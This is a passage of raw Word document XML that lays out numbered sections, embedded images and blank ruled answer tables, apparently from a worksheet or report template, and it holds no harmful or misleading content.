            <wp:extent cx="4618990" cy="1417320"/>
            <wp:effectExtent l="76200" t="76200" r="124460" b="12573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417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26C8" w14:textId="17E29CEB" w:rsidR="005E6C75" w:rsidRDefault="005E6C75" w:rsidP="005C105D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAA9B31" w14:textId="6D1E5099" w:rsidR="005E6C75" w:rsidRDefault="005E6C75" w:rsidP="005C105D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DEDF41" w14:textId="37EE759B" w:rsidR="005E6C75" w:rsidRDefault="005E6C75" w:rsidP="005C105D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C5F928" w14:textId="655A1264" w:rsidR="00A5146C" w:rsidRDefault="00A5146C" w:rsidP="005C105D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18DE3C60" w14:textId="10DDE768" w:rsidR="005C105D" w:rsidRDefault="005C105D" w:rsidP="005C105D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2C0346EB" w14:textId="43360A94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B40A676" w14:textId="43DB1CD0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7ED24D0" w14:textId="58AD0970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1500308" w14:textId="0DE6A1ED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63DEBBFD" w14:textId="35755B5C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723EB16F" w14:textId="732DACEF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3A504ADB" w14:textId="71CF3D22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366934AB" w14:textId="6EA36B60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E5B3E42" w14:textId="00B12812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275ADFB5" w14:textId="329B81D5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12D08DB1" w14:textId="22958579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5D2E33FE" w14:textId="7BC410D0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2BC5F4CC" w14:textId="3CF3ACBF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6B36FBF8" w14:textId="7C50F9FF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993943D" w14:textId="310414B9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49BD507" w14:textId="2691A00C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3BB5A1DC" w14:textId="76DF858F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7813A599" w14:textId="72FA23CB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13C104C" w14:textId="1D223572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4692A7C" w14:textId="19209730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1254D186" w14:textId="5AD71DB2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99B2277" w14:textId="5BD1467B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689C690" w14:textId="3DE68063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ED83BDE" w14:textId="4EEA4391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C2EF050" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRDefault="006E2B58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683F8AEE" w14:textId="57758110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51E5148F" w14:textId="578539CC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2D073362" w14:textId="1A747AAA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1929AF6" w14:textId="3274F2F2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B990B20" w14:textId="27D64E7C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751C6E4" w14:textId="33E0F511" w:rsidR="005E6C75" w:rsidRDefault="005E6C7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57FA873" w14:textId="620D4C75" w:rsidR="005E6C75" w:rsidRPr="00BB6EDB" w:rsidRDefault="005E6C75" w:rsidP="005E6C7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B5FFE5" wp14:editId="2926F538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83A4B" id="Straight Connector 39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6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E2B55" w14:textId="77777777" w:rsidR="005E6C75" w:rsidRPr="00BB6EDB" w:rsidRDefault="005E6C75" w:rsidP="005E6C7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16812769" w14:textId="77777777" w:rsidR="005E6C75" w:rsidRPr="00BB6EDB" w:rsidRDefault="005E6C75" w:rsidP="005E6C75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9A36F1" wp14:editId="753A8DF8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194DF" id="Straight Connector 40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3D19E37" w14:textId="77777777" w:rsidR="005E6C75" w:rsidRPr="00BB6EDB" w:rsidRDefault="005E6C75" w:rsidP="005E6C7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5E6C75" w14:paraId="2963319E" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BAF913A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29BEB900" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D73422E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72AD07EC" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14CC0A1F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292EC12D" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7315DF91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31B2D298" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01B5ACCD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797445D4" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3445EBCF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4BF7A981" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CA7C9DA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51582CE4" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="772E96B2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3EC905F8" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EBEF4FB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75" w14:paraId="56DDF74F" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40F6CB31" w14:textId="77777777" w:rsidR="005E6C75" w:rsidRDefault="005E6C7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569BE" w14:textId="77777777" w:rsidR="005E6C75" w:rsidRPr="00BB6EDB" w:rsidRDefault="005E6C75" w:rsidP="005E6C75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799661E8" w14:textId="77777777" w:rsidR="005E6C75" w:rsidRPr="00BB6EDB" w:rsidRDefault="005E6C75" w:rsidP="005E6C7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1936F0DA" w14:textId="05F80662" w:rsidR="005E6C75" w:rsidRPr="00A5146C" w:rsidRDefault="00036535" w:rsidP="005E6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66112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B160AE9" wp14:editId="530A1A96">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6840121</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4251325" cy="854075"/>
            <wp:effectExtent l="76200" t="76200" r="130175" b="13652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4.a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2" r="21704" b="56422"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4251325" cy="85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75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6BC2A080" w14:textId="500E0124" w:rsidR="005E6C75" w:rsidRDefault="005E6C75" w:rsidP="005E6C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944F61" w14:textId="0D19EEEC" w:rsidR="005E6C75" w:rsidRDefault="006E2B58" w:rsidP="005E6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14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251867136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="022BB56C" wp14:editId="6FAC5130">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>28575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8545195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4737735" cy="1391920"/>
            <wp:effectExtent l="76200" t="76200" r="139065" b="13208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4.b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1391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75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2DB8B4C0" w14:textId="3FDC9A58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79DF4BC" w14:textId="0DA882E5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315F8043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01AF156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2D9B9237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60EA5EE2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3C97D3DA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88F9406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5489BECF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7D606947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ED43219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1A86DBC8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58F390C1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2700F18C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7446599D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8952741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75D4347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698AA1B2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2047A396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57B167DD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4D0D039A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7F074BBA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2CF13D3C" w14:textId="1FD39638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56EFABC7" w14:textId="46BB9C6B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5FF0EA37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0799D677" w14:textId="7777777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39320637" w14:textId="7FC5F058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67A26484" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRDefault="006E2B58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3620CCF6" w14:textId="0AAEB7B8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6BCAC9B6" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRDefault="006E2B58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22AE99E1" w14:textId="2CCA6617" w:rsidR="00036535" w:rsidRDefault="00036535" w:rsidP="005C105D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBB4463" w14:textId="4074E015" w:rsidR="00036535" w:rsidRPr="00036535" w:rsidRDefault="00036535" w:rsidP="005C105D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00036535"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14:paraId="0603E52B" w14:textId="5D595327" w:rsidR="00036535" w:rsidRPr="00036535" w:rsidRDefault="006E2B58" w:rsidP="005C105D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003653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74304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5ED81133" wp14:editId="79614785">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1969770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="760095"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="13525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4.c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760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A731A8" w14:textId="63B2CC6D" w:rsidR="00036535" w:rsidRPr="00036535" w:rsidRDefault="00036535" w:rsidP="005C105D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED339C8" w14:textId="24490D0A" w:rsidR="00036535" w:rsidRPr="00036535" w:rsidRDefault="00036535" w:rsidP="005C105D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00036535">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E948096" w14:textId="21860031" w:rsidR="00036535" w:rsidRDefault="006E2B58" w:rsidP="005C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69184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1DDCEE75" wp14:editId="36A0B8F4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3893623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="1192530"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="14097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4.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19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B234D9" w14:textId="580CCCC8" w:rsidR="00036535" w:rsidRPr="00036535" w:rsidRDefault="00036535" w:rsidP="005C105D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58266A76" w14:textId="72604969" w:rsidR="005E6C75" w:rsidRDefault="00036535" w:rsidP="005C1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1A83F7D0" w14:textId="10937D55" w:rsidR="00036535" w:rsidRPr="00036535" w:rsidRDefault="00036535" w:rsidP="005C105D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62930B43" w14:textId="72ED41CB" w:rsidR="00036535" w:rsidRDefault="006E2B58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868160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A9EB81F" wp14:editId="04113A7E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6447155</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="1176020"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="13843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4.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17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306C5E" w14:textId="5767AED2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3FAA8A87" w14:textId="58BBC994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37311572" w14:textId="6901ED7D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0A00BB84" w14:textId="76247105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6F10CC91" w14:textId="706884D5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0DD9FF51" w14:textId="554832F4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695CAED3" w14:textId="5EAE1CD4" w:rsidR="00036535" w:rsidRDefault="00036535" w:rsidP="00036535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5894C921" w14:textId="4825B82A" w:rsidR="00036535" w:rsidRDefault="00036535" w:rsidP="00036535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A16FA8C" w14:textId="77777777" w:rsidR="00036535" w:rsidRDefault="00036535" w:rsidP="00036535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB2B549" w14:textId="6D3ED7E7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1EEDBB72" w14:textId="626A5E97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25BBA724" w14:textId="3644A1A0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01F9523E" w14:textId="51CB63B6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02BD2F89" w14:textId="4195E7C1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2EE8BC0B" w14:textId="32F1BF5A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7F46AA52" w14:textId="18C8072F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4CC846ED" w14:textId="4B9FE578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5033133F" w14:textId="3BDA45D3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3FB57C74" w14:textId="5F318E20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0B265565" w14:textId="067AB6AD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2CBEC49E" w14:textId="0EDA2436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61ABEF93" w14:textId="6625A049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4C8309FA" w14:textId="4367B5B4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7CB28923" w14:textId="50A4838B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52575C43" w14:textId="1AC0C66B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7088A865" w14:textId="44C52820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5AA13508" w14:textId="4092A3CA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54A24FED" w14:textId="5751B9E4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75554222" w14:textId="3C008C17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7C0B1E00" w14:textId="367137B3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307297E8" w14:textId="6F121D31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24F6DED5" w14:textId="5EBE49DF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4524E1D4" w14:textId="4C476DEA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6B507DA0" w14:textId="41FBB8FC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70F46546" w14:textId="72E839B4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51FAAE84" w14:textId="5BF7023B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2E1D68F4" w14:textId="3950121D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FD3A239" w14:textId="05034DAF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AC7F868" w14:textId="7777777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A176A12" w14:textId="37303156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4EE177E0" w14:textId="7EE30056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6590D9DA" w14:textId="0FE91A55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7CA3DB4F" w14:textId="10CE9B83" w:rsidR="00036535" w:rsidRDefault="00036535" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B95E4F5" w14:textId="5A05EDF7" w:rsidR="00036535" w:rsidRPr="00BB6EDB" w:rsidRDefault="00036535" w:rsidP="000365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8EAA3F" wp14:editId="6226024F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4BFF5" id="Straight Connector 48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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207D8477" w14:textId="77777777" w:rsidR="00036535" w:rsidRPr="00BB6EDB" w:rsidRDefault="00036535" w:rsidP="0003653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0A4F9908" w14:textId="77777777" w:rsidR="00036535" w:rsidRPr="00BB6EDB" w:rsidRDefault="00036535" w:rsidP="00036535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337F37" wp14:editId="3DA45E1C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C2E5A" id="Straight Connector 49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AAE8C8B" w14:textId="77777777" w:rsidR="00036535" w:rsidRPr="00BB6EDB" w:rsidRDefault="00036535" w:rsidP="0003653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036535" w14:paraId="47057FC8" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="055272A9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678C1F34" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3903F2F3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6696982F" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0596004F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0C0C9CC3" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A5939D6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5E708A70" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AE6AC65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0E547387" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E7BCC2C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3FCE7EEB" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58E0B6B7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2DC4B272" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FE7E18C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567BDBA3" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DFE792E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35" w14:paraId="3CE3AAD4" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68A5D4DA" w14:textId="77777777" w:rsidR="00036535" w:rsidRDefault="00036535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D559F" w14:textId="77777777" w:rsidR="00036535" w:rsidRPr="00BB6EDB" w:rsidRDefault="00036535" w:rsidP="00036535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516A56A1" w14:textId="77777777" w:rsidR="00036535" w:rsidRPr="00BB6EDB" w:rsidRDefault="00036535" w:rsidP="0003653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778A3C38" w14:textId="17A923AA" w:rsidR="00036535" w:rsidRPr="00A5146C" w:rsidRDefault="00036535" w:rsidP="00036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0D353977" w14:textId="330C5EFE" w:rsidR="00036535" w:rsidRDefault="00036535" w:rsidP="006E2B58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CA4FCB4" w14:textId="2CBBF9F9" w:rsidR="006E2B58" w:rsidRPr="006E2B58" w:rsidRDefault="006E2B58" w:rsidP="006E2B58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E2B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798288CD" wp14:editId="320225A5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>6525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7062952</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4257675" cy="2562225"/>
            <wp:effectExtent l="76200" t="76200" r="142875" b="1428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88BF91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7D9027D9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2120E866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086DAC90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527F21B2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7F919E11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77047860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24BA8DA3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5E49D54A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42CECA3E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501A1824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68EAC7C5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312906C5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4D3F4483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3EB18CF0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76364CA8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481B447C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2A9F6C7A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5316D01E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49CF9D95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30D8350E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51D541D5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56078FDB" w14:textId="149192B6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2FB61D5F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2FC50507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1F003B00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255C46CD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703A2439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18023E01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765C0B9C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6DD7FF49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6679A7F2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56781580" w14:textId="77777777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5060D83A" w14:textId="57335AF8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</w:p>
    <w:p w14:paraId="4DEA4D4A" w14:textId="617D5BF9" w:rsidR="00036535" w:rsidRDefault="00036535" w:rsidP="00036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</w:p>
    <w:p w14:paraId="5E530565" w14:textId="213E3C72" w:rsidR="006E2B58" w:rsidRDefault="006E2B58" w:rsidP="00036535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E2B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5328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4AE0F2F5" wp14:editId="2BEDF587">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1843515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4448175" cy="838200"/>
            <wp:effectExtent l="76200" t="76200" r="142875" b="13335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A3FF87" w14:textId="427B7C2A" w:rsidR="00036535" w:rsidRDefault="00036535" w:rsidP="00036535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6130B00D" w14:textId="32E59029" w:rsidR="00036535" w:rsidRDefault="006E2B58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2BD83A0E" w14:textId="1A9ED052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  <w:r w:rsidRPr="006E2B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5D49335B" wp14:editId="0DA99115">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3704590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2828925" cy="666750"/>
            <wp:effectExtent l="76200" t="76200" r="142875" b="13335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E9A2D3" w14:textId="7777777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634B520" w14:textId="244923A8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7949CF49" w14:textId="7C0857B6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719D8DA" w14:textId="2E299ED5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  <w:r w:rsidRPr="006E2B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32D4DAC8" wp14:editId="0FAD2077">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>6525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5376041</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4314825" cy="1476375"/>
            <wp:effectExtent l="76200" t="76200" r="142875" b="14287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DFD0DB1" w14:textId="33556443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DF42778" w14:textId="56984850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B1AF77C" w14:textId="180A3E4A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C04657D" w14:textId="12F304DE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00E8048" w14:textId="046200E3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3EC8B000" w14:textId="3EFEEFD5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543870F" w14:textId="7A170514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02AC454" w14:textId="5E89BFE5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93F5990" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRDefault="006E2B58" w:rsidP="006E2B58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21B58E7C" w14:textId="497592B9" w:rsidR="006E2B58" w:rsidRDefault="006E2B58" w:rsidP="006E2B58">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7399"/>
          <w:tab w:val="right" w:pos="85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AB799F" w14:textId="4C37F9E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A7AF48D" w14:textId="2C256590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31B61231" w14:textId="067A3EC0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AC612A2" w14:textId="1BC9B43D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41440E2" w14:textId="3B8CBB6B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0FED6F5" w14:textId="02879D69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7AE806A" w14:textId="035930F8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FB84A47" w14:textId="78738654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2F54971" w14:textId="5C83B73B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4192A66" w14:textId="1DE5DC68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6453440" w14:textId="651C6E74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EC6459D" w14:textId="4FDD4195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7629D0BC" w14:textId="78A0EB9B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07B9B3C" w14:textId="09E2EDEE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1CE7E94" w14:textId="016AE46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7CC90713" w14:textId="7296138F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2795A8D" w14:textId="2386B76F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237D35A" w14:textId="2B2C96B0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89D9BC0" w14:textId="072F9771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7D16EC4" w14:textId="2F4B9431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180DE44" w14:textId="1324F898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C61A2F5" w14:textId="16D23711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9973A6E" w14:textId="58C67600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0A9B6FA" w14:textId="237A0C2A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C317F4D" w14:textId="31ED70DC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7D0F7120" w14:textId="5473C439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783B9240" w14:textId="20668F66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1997F022" w14:textId="74E4050A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6AA255C7" w14:textId="70C1AAF3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50C82F8D" w14:textId="77777777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442B94AD" w14:textId="30300B0F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3E250C26" w14:textId="26ADDE60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7738D5E6" w14:textId="78918366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16AE19C" w14:textId="7C5DD364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3683AC99" w14:textId="748145F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7FEF7D4" w14:textId="41700A51" w:rsidR="00184ECE" w:rsidRPr="00BB6EDB" w:rsidRDefault="00184ECE" w:rsidP="00184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3812A6" wp14:editId="44304079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1632450635" name="Straight Connector 1632450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DD877" id="Straight Connector 163245063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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7672BB" w14:textId="77777777" w:rsidR="00184ECE" w:rsidRPr="00BB6EDB" w:rsidRDefault="00184ECE" w:rsidP="00184EC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4A1C4D4B" w14:textId="77777777" w:rsidR="00184ECE" w:rsidRPr="00BB6EDB" w:rsidRDefault="00184ECE" w:rsidP="00184ECE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263774" wp14:editId="772A1A47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1632450636" name="Straight Connector 1632450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2F10" id="Straight Connector 163245063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ACE1C86" w14:textId="77777777" w:rsidR="00184ECE" w:rsidRPr="00BB6EDB" w:rsidRDefault="00184ECE" w:rsidP="00184EC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184ECE" w14:paraId="13921600" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10291833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7513F1E9" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6662BDB0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09E7140A" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="193463D8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551874B3" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
